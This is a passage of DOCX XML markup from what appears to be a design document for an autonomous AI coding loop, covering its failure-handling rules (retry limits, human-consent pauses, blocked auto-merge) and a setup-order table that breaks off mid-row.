                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/implement</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> with failure output. Max 3 retries → alert + skip.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>iPhone build green, iPad red</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Treated as AC fail (universal-app rule). Back to implement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack boots but </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/health</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Treated as AC fail. Back to implement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/simplify</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> returns P1 finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Auto-applied if cleanly fixable; otherwise back to implement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security checkbox unprovable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PR body says 'needs human verification'. Auto-merge BLOCKED.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CI red after 3 fix attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Append to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>alerts.md</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>, move task to Blocked, pick next.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Three consecutive tasks blocked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Loop pauses, posts global alert, waits for human.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MCP server unavailable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Skill fails fast; alert appended; loop continues degraded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Unknown command (not in allow-list)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Loop pauses pending human consent; lane state coherent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3456"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Both lanes mutate </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>backlog.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5904"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>flock</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> serializes them; second lane waits.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="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Safety net:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The triple-block pause is the global safety net — if anything systematic is broken, the loop stops digging the hole.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>16. Setup order</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bottom-up, roughly one day of work.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B3E"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Backlog file + authority memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>15 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Give the loop something to read and a rulebook.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Permission allow-list + deny-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Populate </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>settings.local.json</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> per §11. Test manually.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/next-task</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/open-pr</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> skills</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1 h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Minimal end-to-end without CI watching yet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>GitHub + Linear MCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>30 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4464"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7F8FA"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Needed before PR/Linear writes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="576"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
